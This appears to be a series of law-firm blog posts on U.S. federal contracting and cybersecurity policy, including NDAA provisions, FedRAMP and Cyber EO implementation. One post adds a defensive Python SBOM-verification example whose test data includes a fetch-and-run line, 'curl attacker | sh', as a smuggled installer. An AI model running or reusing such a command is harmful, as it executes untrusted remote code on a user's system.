On January 19, 2023, the National Institute of Standards and Technology (“NIST”) published a Concept Paper setting out “Potential Significant Updates to the Cybersecurity Framework” and requesting public feedback and comments on the proposed revisions by March 3, 2023.  Originally released in 2014 and previously updated in 2018, the NIST CSF is a framework designed to assist organizations with developing, aligning, and prioritizing “cybersecurity activities with [] business/mission requirements, risk tolerances, and resources.”  Globally, organizations, industries, and government agencies have increasingly relied upon the Framework to establish cybersecurity programs and measure their maturity.  As the name suggests, the Concept Paper outlines potential significant updates to the Framework, and NIST previews that some of the proposed changes are “larger structural changes that may impact compatibility” with the current version of the Framework.  For example, NIST proposes expanding the Framework’s five functions (Identify, Protect, Detect, Respond, and Recover) to add a new function on cybersecurity governance (“Govern”). 

A new post on Covington’s Inside Privacy blog discusses the potential significant updates to the NIST Cybersecurity Framework.

The Department of Defense is seeking early input on implementation of the James M. Inhofe National Defense Authorization Act for Fiscal Year 2023 (the “FY2023 NDAA”) in the Federal Acquisition Regulation (FAR) and the Defense Federal Acquisition Regulation Supplement (DFARS).  Although this early engagement process will not replace the formal rulemaking process, it presents a significant opportunity for government contractors, technology providers, industry associations, and other interested parties to provide their perspectives on acquisition-related provisions of this year’s NDAA.  Input at this stage may shape the later rulemaking by guiding the areas the rule makers focus on and the questions they pose when they formally request comments.

Continue Reading DoD Seeks Early Input Regarding FY2023 NDAA Implementation in Acquisition Regulations

On December 23, 2022, President Biden signed the James M. Inhofe National Defense Authorization Act for Fiscal Year 2023 (the “FY2023 NDAA”) into law.  As described in Covington’s Client Alert, FY23 NDAA: Provisions of Interest for Almost All Government Contractors, the FY23 NDAA contains provisions of interest for almost all U.S. Government contractors.  One provision likely to be of particular interest to U.S. contractors who provide or plan to provide cloud computing services to the U.S. Government is the FedRAMP Authorization Act (the “Act”), which codifies the Federal Risk and Authorization Management Program (“FedRAMP”).

Of note, the Act creates a “presumption of adequacy” that cloud providers with an authorization from one agency can use that authorization with other agencies.  This is an expansion compared to the current process, which allows authorizations by the FedRAMP Joint Authorization Board, but not authorizations from individual agencies, to serve as the basis for an agency’s own authorization process.  The Act also creates the Federal Secure Cloud Advisory Committee, composed of 15 members from the public and private sectors, to provide recommendations regarding FedRAMP and the acquisition of cloud services more generally.

Continue Reading FY2023 NDAA Makes Notable Changes to FedRAMP Program

On December 23, 2022, President Biden signed the James M. Inhofe National Defense Authorization Act for Fiscal Year 2023 into law.  The Act contains two significant prohibitions regarding the procurement and use of semiconductor products and services from specific Chinese companies and other foreign countries of concern that will come into effect in December 2027. 

Continue Reading NDAA Prohibits Government Purchase and Use of Certain Semiconductors

In legislation passed last week, Congress directed the FAR Council to issue new rules for contractor organizational conflicts of interest (“OCIs”).  The legislation itself did not create any new OCI standards, but provided factors for the Council to consider, focusing on conflicts of interest for companies that act as consultants to the government.

It is unclear at this point what the precise nature and extent of the resulting changes to the OCI rules may be.  But the new law makes it likely that there will be some fairly significant revisions.  Congress set a deadline of Summer 2024 for the new regulations, so the contracting community should be on the lookout for a notice of proposed rulemaking in the coming months, and should not hesitate to submit comments for the government’s consideration.

Continue Reading New Contractor Conflict of Interest Rules May Be Coming Soon, with a Special Focus on Consulting and Advisory Contracts

As part of the FY23 National Defense Authorization Act (“NDAA”), Congress has given the Department of Defense authority to pay defense contractors for increased costs due to inflation.  Section 822 of the NDAA amends Public Law 85-804 (50 U.S.C. 1431) to allow contractors to apply for adjustments, while also giving the DoD wide discretion to grant or deny requests.  President Biden is expected to sign the FY23 NDAA soon, and Section 822 has the potential to be welcome news for contractors who have been battling inflation under multi-year, fixed-price contracts. 

As readers of this blog know from prior posts, DoD has issued position papers over the last year that attempt to address inflation with existing legal tools, but as a practical matter, the Department has provided few options for contractors impacted by rising costs.  The new NDAA provision could finally provide DoD with the legal support it needs to aid contractors struggling with inflation.  However, many questions remain about how this law will work and whether it will actually meet the growing needs of the defense industrial base.  In particular, Congress has not yet appropriated money to fund applications for relief, and DoD must prepare guidance for implementing the statute.  Both of these things will need to happen before contractors can apply for and potentially receive inflation-based price adjustments under this amended Public Law 85-804 authority.

This post discusses the amendment and analyzes the hurdles that remain between defense contractors and inflationary relief.

Continue Reading Congress Offers Greater Hope for Defense Contractors Battling Inflation; Actual Relief Is Still Not Clear

This is the nineteenth in a series of Covington blogs on implementation of Executive Order 14028, “Improving the Nation’s Cybersecurity,” issued by President Biden on May 12, 2021 (the “Cyber EO”).  The first blog summarized the Cyber EO’s key provisions and timelines, and the subsequent blogs described the actions taken by various Government agencies to implement the Cyber EO from June 2021 through October 2022.  This blog describes key actions taken to implement the Cyber EO during November 2022.

I. CISA, NSA, and ODNI Release Software Supply Chain Security Guide for Customers 

On November 17, 2022, the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Office of the Director of National Intelligence (ODNI) released the third in a series of recommended practice guides for securing the software supply chain (the “Customer Guide”).  The first practice guide in this series – published in September 2022 – was for software developers, and the second – published in October 2022 – was for software suppliers.  Each of the three guides is intended to supplement the Secure Software Development Framework (SSDF) published by the National Institute of Standards and Technology (NIST) pursuant to Section 4 of the Cyber EO.

The Customer Guide identifies key supply chain security objectives for software customers (acquirers) and recommends several broad categories of practices to achieve those objectives including security requirements planning, secure software architecture, and maintaining the security of software and the underlying infrastructure (e.g., environment, source code review, test).  For each of these practice categories, the guide identifies examples of scenarios that could be exploited (threat scenarios) and examples of controls that could be implemented to mitigate those threat scenarios. 

Section 2.1.3 of the Customer Guide is notable, and identifies objectives, scenarios, and mitigations for software acquisition contracts.  This section highlights contracts that would be considered higher risk, including (i) those with suppliers or sources under foreign control; (ii) contracts with incomplete security and supply chain requirements; (iii) missing software bills of materials (“SBOMs”); (iv) suppliers with poor security hygiene, including those that have experienced a compromise that could impact their development cycle; and (v) suppliers who alter or substitute components in the product prior to package signing and hashing.

To address some of these concerns, the guide recommends that such contracts incorporate a number of provisions designed to reduce supply chain risks.  Specific recommendations include:

  • Incorporation of forthcoming FAR/DFARS provisions requiring a self-attestation from each supplier that provides products to U.S. Government customers, giving visibility into the provenance of each software product delivered;
  • A timeline or checklist of key steps that comprise the supplier’s security processes that were performed in the development of the product;
  • Signature by the supplier-designated official responsible for the security hygiene of the development process and infrastructure; and
  • A requirement for the supplier to provide cryptographic security for hashing/signature infrastructure of its product distribution system/method.

The Customer Guide also recommends that customers require suppliers to inform them on how to verify the integrity of all software components, including through:

  • Requiring the use of a hash, signature, or similar method to ensure the integrity of each component, and requiring each supplier to inform the customer how to verify the integrity of the components;
  • Requiring that all artifacts sent by the supplier be in a standardized SBOM format;
  • Providing SBOMs for all upgrades;
  • Ensuring newly issued SBOMs incorporate all changes to the product baseline;
  • Providing continuous reporting for all of the supplier’s key attributes, such as its ownership, geolocation and foreign controls, as well as for any changes of the key attributes; and
  • Notifying the customer of cyber incidents and investigations, mitigations, and impacts to the product or the development environment of the product.
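The integrity and SBOM recommendations above describe what a customer should be able to check on receipt of a delivery.  The following is an added example of such a check, written for this post and not code from the CISA/NSA/ODNI guide: it parses a minimal CycloneDX-style SBOM, compares each delivered component against the SHA-256 the supplier published, flags files that arrive without an SBOM entry (the “altered or substituted component” scenario), and diffs two SBOMs to confirm that an upgrade’s SBOM accounts for every change to the baseline.  The SBOMs, component bytes, and names (`app`, `libcrypto`, `helper`, `installer.sh`) are constructed for illustration.

```python
"""Check a software delivery against its SBOM: every delivered component must
match the SHA-256 the supplier published, nothing undocumented may arrive, and a
new SBOM must account for every change since the previous baseline.
Added example using constructed data; not code from the CISA/NSA/ODNI guide."""
import hashlib
import json


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_sbom(components: dict[str, tuple[str, bytes]]) -> str:
    """Build a minimal CycloneDX-style JSON SBOM from {name: (version, bytes)}.
    Stands in for the document the supplier ships; only the fields used below."""
    return json.dumps({
        "bomFormat": "CycloneDX",
        "specVersion": "1.4",
        "components": [
            {"name": name, "version": ver,
             "hashes": [{"alg": "SHA-256", "content": sha256_hex(blob)}]}
            for name, (ver, blob) in components.items()
        ],
    })


def parse_sbom(text: str) -> dict[str, tuple[str, str]]:
    """Return {name: (version, sha256)}.  A component without a SHA-256 is
    rejected: an entry the customer cannot verify is as bad as a missing SBOM."""
    doc = json.loads(text)
    if doc.get("bomFormat") != "CycloneDX":
        raise ValueError("unsupported SBOM format")
    out = {}
    for comp in doc["components"]:
        digests = [h["content"].lower() for h in comp.get("hashes", [])
                   if h["alg"] == "SHA-256"]
        if not digests:
            raise ValueError(f"{comp['name']}: no SHA-256 in SBOM")
        out[comp["name"]] = (comp["version"], digests[0])
    return out


def verify_delivery(sbom_text: str, delivered: dict[str, bytes]) -> dict[str, str]:
    """Status per component: ok, hash-mismatch, not-delivered, or undocumented
    (a file the supplier shipped that the SBOM never mentions)."""
    expected = parse_sbom(sbom_text)
    status = {}
    for name, (_, digest) in expected.items():
        if name not in delivered:
            status[name] = "not-delivered"
        elif sha256_hex(delivered[name]) != digest:
            status[name] = "hash-mismatch"
        else:
            status[name] = "ok"
    for name in delivered:
        if name not in expected:
            status[name] = "undocumented"
    return status


def sbom_diff(old_text: str, new_text: str) -> dict[str, list[str]]:
    """What changed between two SBOMs: added, removed, and components whose
    version or hash differs.  If the delivered bits changed but this diff is
    empty, the new SBOM did not incorporate the change to the baseline."""
    old, new = parse_sbom(old_text), parse_sbom(new_text)
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(n for n in old.keys() & new.keys() if old[n] != new[n]),
    }


# Constructed release 1.0: what the supplier's SBOM says was built.
BUILD_V1 = {"app": ("1.0.0", b"app v1 binary"),
            "libcrypto": ("3.0.7", b"libcrypto 3.0.7")}
SBOM_V1 = make_sbom(BUILD_V1)

# Constructed release 1.1: libcrypto was rebuilt and a helper was added.
BUILD_V2 = {"app": ("1.0.0", b"app v1 binary"),
            "libcrypto": ("3.0.8", b"libcrypto 3.0.8"),
            "helper": ("0.1", b"helper 0.1")}
SBOM_V2 = make_sbom(BUILD_V2)

# Constructed 1.1 delivery in which libcrypto was substituted after the SBOM
# was produced and an unlisted file slipped in (the guide's scenario (v)).
DELIVERED_V2 = {"app": b"app v1 binary",
                "libcrypto": b"libcrypto 3.0.8 substituted",
                "helper": b"helper 0.1",
                "installer.sh": b"curl attacker | sh"}


def check_v2() -> dict[str, str]:
    return verify_delivery(SBOM_V2, DELIVERED_V2)


if __name__ == "__main__":
    print(check_v2())
    print(sbom_diff(SBOM_V1, SBOM_V2))
```

Both failure modes the guide calls out surface as distinct statuses rather than a generic failure: a substituted component is a `hash-mismatch`, and an unlisted file is `undocumented`.  The diff against the prior SBOM gives the customer an independent record of what an upgrade changed, which is what the “incorporate all changes to the product baseline” recommendation is asking the supplier to make verifiable.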

II. NIST Announces Project to Develop Guidance for Using DevSecOps Practices to Secure Software

On November 19, 2022, the NIST National Cybersecurity Center of Excellence (NCCoE) released a document, titled “Software Supply Chain and DevOps Security Practices: Implementing a Risk-Based Approach to DevSecOps,” that describes its planned project to develop and document risk-based DevSecOps practices to secure software supply chains.  The document defines “DevSecOps” as the process of integrating security practices developed by a security team into existing “pipelines,” such as continuous integration/continuous delivery (CI/CD), and into the existing toolchains used by developers and operators.  The document notes that the “project’s objective is to produce practical and actionable guidelines that meaningfully integrate security practices into development methodologies.”

The DevSecOps project will ultimately result in the issuance of a publicly available NIST Cybersecurity Practice Guide that industry, government, and other organizations can use when choosing and implementing DevSecOps practices in order to improve the security of the software they develop and/or operate.  This guide will address how such organizations can generate artifacts as a by-product of their DevSecOps practices to support the organization’s self-attestations and compliance with applicable NIST and cybersecurity supply chain risk management practices.

III. DOD Issues Its Zero-Trust Strategy and Roadmap

On November 22, 2022, the Department of Defense (DOD) released its Zero Trust strategy for the next five years (FY23 – FY27).  According to the strategy, Zero Trust “uses continuous multi-factor authentication, micro-segmentation, advanced encryption, endpoint security, analytics, and robust auditing, among other capabilities, to fortify data, applications, assets, and services to deliver cyber resiliency.”  DOD’s strategy identifies four strategic goals, seven pillars, forty-five capabilities, and 152 activities involved in migrating DOD IT systems to Zero Trust.  The strategy requires that DOD components reach the “Target” level of Zero Trust, defined as completion of 91 of the 152 activities, by FY27, subject to a waiver process administered by DOD’s Zero Trust Portfolio Management Office.  Among others, the document lists “[i]ncorporate ZT requirements into DoD-wide and Component-specific strategies, policies, frameworks, and directives, and contracts by end of FY2023 and next iteration through FY 2027” as an objective of the strategy.

This is the eighteenth in a series of Covington blogs on implementation of Executive Order 14028, “Improving the Nation’s Cybersecurity,” issued by President Biden on May 12, 2021 (the “Cyber EO”).  The first blog summarized the Cyber EO’s key provisions and timelines, and the subsequent blogs described the actions taken by various Government agencies to implement the Cyber EO from June 2021 through September 2022.  This blog describes key actions taken to implement the Cyber EO during October 2022.

I.  CISA, NSA, and ODNI Release Software Supply Chain Security Guidance for Suppliers 

In October 2022, the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Office of the Director of National Intelligence (ODNI) released Part 2 of their series of recommended practice guides for securing the software supply chain (the “Supplier Guide”).  This second practice guide is for software suppliers; Part 1 is intended to be used by software developers, and the third (and final) guide will be targeted to software customers (i.e., acquirers).  Each of these guides is intended to supplement the Secure Software Development Framework (SSDF) published by the National Institute of Standards and Technology (NIST) pursuant to Section 4 of the Cyber EO.

According to the Supplier Guide, a software supplier acts as a liaison, or intermediary, between the developer and customer, and, as such, “retains primary responsibility over the following”:

  1. Maintaining the integrity of securely delivered software.
  2. Validating software packages and updates.
  3. Maintaining awareness of known vulnerabilities.
  4. Accepting customer reports of issues or newly discovered vulnerabilities and notifying developers for remediation.

The guide is intended to reflect “industry best practices and principles.”  It identifies key supplier objectives and recommends several broad categories of practices to achieve those objectives.  For each of these practice categories, the guide identifies scenarios that could be exploited (threat scenarios) and actions that could be taken to mitigate those threat scenarios.  For example, the guide outlines recommended mitigations for protecting the integrity of software code being developed either on premises or in a SaaS cloud solution, among many others.

The guide also has several appendices.  Of particular interest is Appendix C, “Supply-chain Levels for Software Artifacts” (SLSA).  SLSA defines four levels of security requirements, which the guide ties to industry standards.  Appendix C designates which requirements apply to each of the four levels, with the fourth level representing the ideal end state for a secure software supply chain “from source to service.”

II. White House Issues Fact Sheet Detailing Past and Future Cybersecurity Efforts

On October 11, 2022, the Biden Administration issued a fact sheet that described various efforts that the Administration has undertaken to strengthen and safeguard the nation’s cybersecurity.  Among these efforts are several mandated by the Cyber EO.  The fact sheet demonstrates the Administration’s overall emphasis on implementation of the Cyber EO and its continued view of federal contracting as a lever to pull in that process.  Among other things, the fact sheet highlights that the Administration “issued a strategy for Federal zero trust architecture implementation, as well as budget guidance to ensure that Federal agencies align resources to our cybersecurity goals.”  Regarding procurement, the fact sheet states that “we are . . . harnessing the purchasing power of the Federal Government to improve the cybersecurity of products for the first time, by requiring security features in all software purchased by the Federal Government, which improves security for all Americans.”  As discussed in more detail below, the fact sheet also highlighted the White House’s plan to bring together private companies, associations, and Government agencies to discuss the development of a label for Internet of Things (IoT) devices “so that Americans can easily recognize which devices meet the highest cybersecurity standards to protect against hacking and other cyber vulnerabilities.”         

III. White House Holds Meeting to Discuss Cybersecurity Label for Consumer Internet-of-Things Devices

As previewed by the October 11 White House fact sheet (see section II above), the Biden Administration convened a meeting of representatives of industry, associations, and Government agencies on October 19, 2022 to discuss the Administration’s cybersecurity labelling program for IoT devices.  This program is based on labelling criteria developed by the IoT labelling pilot program conducted by NIST pursuant to the Cyber EO.  These criteria envision a physical label on the IoT device accompanied by a QR code that consumers could use to obtain further information regarding the cybersecurity vulnerabilities and resilience of the device, coupled with vendor self-attestations and possible third-party certifications.  Speakers at the meeting suggested that the Administration is planning a targeted rollout of a national cybersecurity labelling program in Spring 2023.

On December 1, 2022, the Department of Defense, General Services Administration, and NASA published a final rule addressing “Effective Communication Between Government and Industry,” which is aimed at “encourag[ing] communication between Government acquisition personnel and industry.”

The rule adds a paragraph to FAR 1.102-2 that reads as follows:

The Government must not hesitate to communicate with industry as early as possible in the acquisition cycle to help the Government determine the capabilities available in the marketplace.  Government acquisition personnel are permitted and encouraged to engage in responsible and constructive exchanges with industry (e.g., see 10.002 and 15.201), so long as those exchanges are consistent with existing laws and regulations, and do not promote an unfair competitive advantage to particular firms.

There were 19 comments on the proposed rule, which raised a range of issues, including potential changes to the FAR beyond Part 1; a desire for the rule to “require” (rather than “encourage”) communication between Government and industry; and concerns about “Rigid Regulatory Structure Inhibit[ing] Communication.”

The proposed rule also had invited public feedback on ways to enhance communication between the Government and industry, including “whether it may be beneficial to encourage or require contracting officers to conduct discussions with offerors after establishing the competitive range for contracts of a high dollar threshold.”  A number of respondents expressed support for encouraging or requiring discussions, while one respondent expressed concern that requiring discussions for all contracts “may unnecessarily slow the acquisition process.”

The final rule implements a section of the National Defense Authorization Act for Fiscal Year 2016, and has an effective date of December 30, 2022.

On November 4, 2022, the U.S. Department of Transportation (“DOT”) published two proposed waiver notices with request for comments related to the Bipartisan Infrastructure Law’s Build America, Buy America Act (“BABA”).  Both notices stated that DOT’s existing temporary waiver for construction materials would not be extended past its expiration on November 10, 2022.  One notice proposes a public interest waiver for certain narrow categories of contracts and solicitations to continue the transition to the construction materials standard.  The other notice proposes a public interest waiver for de minimis costs, small grants, and minor components.  Comments on both notices are due November 20, 2022.

Continue Reading Department of Transportation Issues Two Proposed Waiver Notices for Build America, Buy America